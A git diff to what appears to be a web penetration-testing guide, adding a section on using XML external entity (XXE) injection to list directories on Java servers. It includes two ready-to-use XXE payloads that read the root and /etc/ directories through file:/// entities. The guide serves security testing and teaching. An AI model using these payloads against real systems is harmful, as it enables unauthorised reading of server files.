diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
index aded7f527..d08f86571 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
 
 ![](../.gitbook/assets/image%20%2832%29.png)
 
+### Directory listing
+
+In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
+
+```markup
+<!-- Root / -->
+<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
+
+<!-- /etc/ -->
+<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
+```
+
 ### SSRF
 
 An XXE could also bu used to abuse a SSRF inside a cloud